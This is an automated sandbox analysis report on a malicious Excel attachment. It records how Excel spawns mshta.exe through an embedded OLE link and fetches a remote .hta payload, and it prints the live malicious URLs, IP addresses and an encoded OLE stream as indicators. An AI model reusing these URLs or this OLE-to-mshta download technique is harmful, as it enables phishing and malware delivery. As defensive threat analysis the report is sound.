Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nuevo-orden.xla.xlsx

Overview

General Information

Sample name:Nuevo-orden.xla.xlsx
Analysis ID:1586900
MD5:3851138774f61b2de118337f4c787f57
SHA1:5550ce43b2bf41ba056404a0924e458e3954af80
SHA256:2b14225a0e97081a7142e16423136b06c17cea24ed34b9e696864823468d7dfc
Tags:xlsxuser-threatinte1
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 1476 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 520 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 1168 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2260 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 1476, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 520, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1476, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 54646
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 54646, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1476, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Nuevo-orden.xla.xlsxReversingLabs: Detection: 18%
Source: Nuevo-orden.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.7:54646 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54424 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.7:54424
Source: global trafficTCP traffic: 192.168.2.7:54424 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.7:54424
Source: global trafficTCP traffic: 192.168.2.7:54424 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.7:54424
Source: global trafficTCP traffic: 192.168.2.7:54424 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.7:54646 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.7:54646
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.3.27.144:80 -> 192.168.2.7:54647
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: global trafficTCP traffic: 192.168.2.7:54647 -> 192.3.27.144:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 83MB
Source: global trafficTCP traffic: 192.168.2.7:54424 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewIP Address: 192.3.27.144 192.3.27.144
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/mpa/seemebestthingsevermeetgivenbestthingsfornewways.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.27.144
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: Nuevo-orden.xla.xlsxString found in binary or memory: https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage
Source: unknownNetwork traffic detected: HTTP traffic on port 54646 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54646
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.7:54646 version: TLS 1.2

System Summary

barindex
Source: Nuevo-orden.xla.xlsxOLE: Microsoft Excel 2007+
Source: Nuevo-orden.xla.xlsxOLE: Microsoft Excel 2007+
Source: Nuevo-orden.xla.xlsxOLE indicator, VBA macros: true
Source: Nuevo-orden.xla.xlsxStream path 'MBD0020109C/\x1Ole' : https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage& \04`_'E_&M_Mhtti:1QU]7@$%}Vcy7QGX2Lgk5fujICzf4aJnOU5sNqfxeFvh6Amql5vXpSCcaePH56b423B8Zbt1b8Ddgtqy9ETfqCvGm4kPhkOJqPrwSm0538cQBXIH0TIiXh5F7071RDVRjVOk0LiZ0lvD8jk8Uq0vCIt4PYuef7pK7RjTmEk0oTZhoqH1AdrxxMoHYud3ZkHzjiVbS7628GnAR90J2Wj8unMP6bDpK)C!`w_}fcK^}Ou
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'nuevo-orden.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal64.expl.winXLSX@6/4@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Nuevo-orden.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{89297327-E439-4491-A78B-BF0D7E6E0A77} - OProcSessId.datJump to behavior
Source: Nuevo-orden.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Nuevo-orden.xla.xlsxReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nuevo-orden.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Nuevo-orden.xla.xlsxStatic file information: File size 1091584 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Nuevo-orden.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
